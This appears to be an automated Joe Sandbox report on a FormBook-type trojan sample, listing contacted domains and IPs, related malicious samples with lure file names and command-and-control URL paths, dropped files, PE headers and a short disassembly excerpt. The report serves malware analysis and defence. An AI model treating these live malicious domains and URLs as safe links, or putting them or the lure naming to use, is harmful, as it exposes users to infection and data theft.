https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.dating-apps-az-dn5.xyz | pTPcvfjkbwUWkD.exe, 00000005.00000002.3522074275.0000000004D85000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://joker.com/?pk_campaign=Parking&pk_kwd=text | winrs.exe, 00000003.00000002.3521201601.0000000004D28000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000003.00000002.3522437440.0000000006070000.00000004.00000800.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000003C68000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www70.earbudsstore.shop/ | pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.00000000032FC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | winrs.exe, 00000003.00000002.3521201601.0000000004098000.00000004.10000000.00040000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3520838220.0000000002FD8000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | winrs.exe, 00000003.00000003.1965144081.0000000007B68000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
194.195.220.41 | www.earbudsstore.shop | Germany | 6659 | NEXINTO-DE | true
209.74.77.109 | www.dailyfuns.info | United States | 31744 | MULTIBAND-NEWHOPEUS | true
188.114.97.3 | www.beylikduzu616161.xyz | European Union | 13335 | CLOUDFLARENETUS | true
103.230.159.86 | superiorfencing.net | Australia | 133159 | MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU | true
194.245.148.189 | www.maitreyatoys.world | Germany | 5517 | CSLDE | true
23.167.152.41 | gtml.huksa.huhusddfnsuegcdn.com | Reserved | 395774 | ESVC-ASNUS | false
188.114.96.3 | www.mydreamdeal.click | European Union | 13335 | CLOUDFLARENETUS | false
66.29.132.194 | orbitoasis.online | United States | 19538 | ADVANTAGECOMUS | true
118.107.250.103 | www.zxyck.net | Hong Kong | 24321 | OCENET-AS-APOCESdnBhdISPMY | false
199.59.243.228 | www.dating-apps-az-dn5.xyz | United States | 395082 | BODIS-NJUS | true
202.92.5.23 | thaor56.online | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586004
Start date and time: 2025-01-08 16:11:35 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KSts9xW7qy.exe
renamed because original name is a hash value
Original Sample Name: faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@13/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 49
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target pTPcvfjkbwUWkD.exe, PID 2412 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded the maximum capacity and may have missing disassembly code
• VT rate limit hit for: KSts9xW7qy.exe
                                                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context

194.195.220.41
  Invoice 10493.exe | malicious | FormBook
  • www.earbudsstore.shop/0gis/?h7i-=tZtx&IUY=aMrcg/vn2G/nVrncRMm9sg/9wEZLpPTCuDhUOTj2ocWrQXkoPHFbln5FmLoTaWY74KRoWkXSZUSbj2dC1qWbeU//egp4ZoVrxwEcZqidFa5edjFbZGfsKVU=
  A2028041200SD.exe | malicious | FormBook
  • www.earbudsstore.shop/0gis/
  A2028041200SD.exe | malicious | FormBook
  • www.earbudsstore.shop/0gis/
  SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook
  • www.gemtastic.shop/junu/
  Quotation-27-08-24.exe | malicious | FormBook
  • www.techcables.shop/0hup/
  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook
  • www.ytonetgearhub.shop/l8y2/
  swift_payment_pdf.exe | malicious | FormBook
  • www.cheapdesklamp.shop/9nq7/

209.74.77.109
  Invoice 10493.exe | malicious | FormBook
  • www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx
  Document_084462.scr.exe | malicious | FormBook, GuLoader
  • www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
  Proforma invoice - Arancia NZ.exe | malicious | FormBook
  • www.greenthub.life/r3zg/
  A2028041200SD.exe | malicious | FormBook
  • www.dailyfuns.info/n9b0/
  W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer
  • www.gogawithme.live/6gtt/
  DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer
  • www.futuru.xyz/8uep/
  PAYROLL LIST.exe | malicious | FormBook
  • www.greenthub.life/r3zg/
  file.exe | malicious | FormBook
  • www.moviebuff.info/4r26/
  PO #2411071822.exe | malicious | FormBook
  • www.gogawithme.live/6gtt/
  Quotation.exe | malicious | FormBook
  • www.gogawithme.live/6gtt/

188.114.97.3
  GTA5-elamigos.exe | malicious | Esquele Stealer
  • /api/get/dll
  DHL DOCS 2-0106-25.exe | malicious | FormBook
  • www.uzshou.world/ricr/
  Order Inquiry.exe | malicious | FormBook
  • www.cifasnc.info/8rr3/
  Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT
  • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
  Payment Receipt.exe | malicious | FormBook
  • www.cifasnc.info/8rr3/
  dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown
  • /api/get/free
  dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown
  • /api/get/free
  RFQ 3100185 MAHAD.exe | malicious | FormBook
  • www.rgenerousrs.store/o362/
  A2028041200SD.exe | malicious | FormBook
  • www.beylikduzu616161.xyz/2nga/
  Delivery_Notification_00000260791.doc.js | malicious | Unknown
  • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.mydreamdeal.clickInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.27.59
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.169.6
                                                                      ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 104.21.27.59
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      www.dating-apps-az-dn5.xyzDHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 199.59.243.227
                                                                      www.zxyck.netInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      www.maitreyatoys.worldInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousUnknownBrowse
                                                                      • 104.18.95.41
                                                                      https://u18282959.ct.sendgrid.net/ls/click?upn=u001.rEMfFlpAoJgeimh0eSdetqZJOaDEFgZEM86yJv-2FFqn4BDVcYSBJ7qe3MiIpMf7EHr39f_olH575WPuDKQ6-2BlwfkTb3bEPQyZlspfhjzLUkESeUKdz-2BSLVmhS-2BiNhtE4sjBDlEtszfbsE5c6igxavK3muY3tYeP6QkmX-2BJi-2BaLU6j8Wsp6hQUS9QOYhOuxeiGpmu9xPXTXniG-2FhK47xPzbY2a7dAVr4WH1EaPd9qfgngR-2BS0-2BE0l9vGYKsxljCm-2F3LXvjLQIge-2FSmK3YEyKDG8HCxUjDZIuKEbjKZRrfVUUqiw37aYZrphVQ5WvB0QOlR-2Be2shKtaVihd3RfTtBEd0NyHk9A-3D-3DGet hashmaliciousUnknownBrowse
                                                                      • 104.18.86.42
                                                                      XL-1-6-25-(EXCEL LATEST 2025).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      http://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9Get hashmaliciousPhisherBrowse
                                                                      • 188.114.96.3
                                                                      http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=Get hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.coGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 188.114.96.3
                                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 104.21.53.168
                                                                      Selvi Payroll Benefits & Bonus Agreementfdp.pdfGet hashmaliciousUnknownBrowse
                                                                      • 104.17.25.14
                                                                      MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.230.159.86
                                                                      https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                      • 103.1.185.157
                                                                      http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.16.131.131
                                                                      http://coastiesmag.com.auGet hashmaliciousUnknownBrowse
                                                                      • 103.4.234.120
                                                                      TRe8oqmYKc.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      cundi.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.16.161.29
                                                                      CSLDEmiori.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 194.245.229.87
                                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.229.64
                                                                      Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.230.66
                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 159.25.86.139
                                                                      nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 194.245.230.82
                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 194.245.186.15
                                                                      PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 194.245.148.189
                                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 159.25.233.243
                                                                      NEXINTO-DEATT562720.htmGet hashmaliciousUnknownBrowse
                                                                      • 194.163.42.36
                                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                                      • 212.229.142.163
                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                      • 212.228.15.172
                                                                      chernobyl.i586.elfGet hashmaliciousMirai, GafgytBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      chernobyl.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                      • 195.179.230.64
                                                                      MULTIBAND-NEWHOPEUSrQuotation.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.40
                                                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.189
                                                                      z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.41
                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.58
                                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.40
                                                                      ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                      • 209.74.95.101
                                                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.79.42
                                                                      Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.187
                                                                      No context
                                                                      No context
Process: C:\Windows\SysWOW64\winrs.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\KSts9xW7qy.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.995366552330444
Encrypted: true
SSDEEP: 6144:hog9HDHJiPjcVQ/wdG50O1JO6boTyw1PnRBn0KBex+mXPCkrs/AFs:hoYjHJiPjczMNJO6aysPRB0KBex+mXPc
MD5: E5B683F350C2C1EFF6F6ACCCDF76A1F9
SHA1: 72DAB3857C699484AB1A8A95151F71798BD51C7F
SHA-256: ADBCFC5810D4EABE1C074200350DEE6A07AFD0B921D5059529EAEDEE5C4E236D
SHA-512: B400BDC1CD2563E864024C956FF91A1C41F5986FFCE255694BF25DEB7C5701521E1A15DAEB5789972D9F23E65B5E6B7DDC2C6F69C74E24E10C9FB0D4D1E202CB
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\KSts9xW7qy.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.995366552330444
Encrypted: true
SSDEEP: 6144:hog9HDHJiPjcVQ/wdG50O1JO6boTyw1PnRBn0KBex+mXPCkrs/AFs:hoYjHJiPjczMNJO6aysPRB0KBex+mXPc
MD5: E5B683F350C2C1EFF6F6ACCCDF76A1F9
SHA1: 72DAB3857C699484AB1A8A95151F71798BD51C7F
SHA-256: ADBCFC5810D4EABE1C074200350DEE6A07AFD0B921D5059529EAEDEE5C4E236D
SHA-512: B400BDC1CD2563E864024C956FF91A1C41F5986FFCE255694BF25DEB7C5701521E1A15DAEB5789972D9F23E65B5E6B7DDC2C6F69C74E24E10C9FB0D4D1E202CB
Malicious: false
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.14010960049132
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: KSts9xW7qy.exe
File size: 1'207'296 bytes
MD5: 0cff79b58dc5c20effd62a99e489556c
SHA1: fc68ff8f2d72961ccedda7fe76c95f1270e21d10
SHA256: faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea
SHA512: 705b50572adb78326f67654cacc7a3745391e0c37bda0589abd4d91e5c7e2ed50619e8a39833803ef2d88f799ccd3ca4d3ad79f73ddf126bfe4449c8ce88be56
SSDEEP: 24576:Itb20pkaCqT5TBWgNQ7aTfLAKuhoiGwaSGQvVP3C6A:RVg5tQ7aTfLAKAGwaiRS5
TLSH: 7C45D01273DE8365C3B25273BA65B701BEBF782506A1F56B2FD80D3DA920122521E773
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67485DC5 [Thu Nov 28 12:10:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
                                                                      Instruction
                                                                      call 00007FE1C0C7075Fh
                                                                      jmp 00007FE1C0C63774h
                                                                      int3
                                                                      int3
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [esp+10h]
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov edi, dword ptr [esp+0Ch]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007FE1C0C638FAh
                                                                      cmp edi, eax
                                                                      jc 00007FE1C0C63C5Eh
                                                                      bt dword ptr [004C0158h], 01h
                                                                      jnc 00007FE1C0C638F9h
                                                                      rep movsb
                                                                      jmp 00007FE1C0C63C0Ch
                                                                      cmp ecx, 00000080h
                                                                      jc 00007FE1C0C63AC4h
                                                                      mov eax, edi
                                                                      xor eax, esi
                                                                      test eax, 0000000Fh
                                                                      jne 00007FE1C0C63900h
bt dword ptr [004BA370h], 01h
jc 00007FE1C0C63DD0h
bt dword ptr [004C0158h], 00000000h
jnc 00007FE1C0C63A9Dh
test edi, 00000003h
jne 00007FE1C0C63AAEh
test esi, 00000003h
jne 00007FE1C0C63A8Dh
bt edi, 02h
jnc 00007FE1C0C638FFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE1C0C63903h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE1C0C63955h
bt esi, 03h
jnc 00007FE1C0C639A8h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5da3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5da3c | 0x5dc00 | 4ecfde17afb34d2f46673709f383794b | False | 0.9294322916666666 | data | 7.898861479386194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x54d41 | data | | | 1.0003338542611029
RT_GROUP_ICON | 0x1214fc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x121574 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x121588 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12159c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1215b0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x12168c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
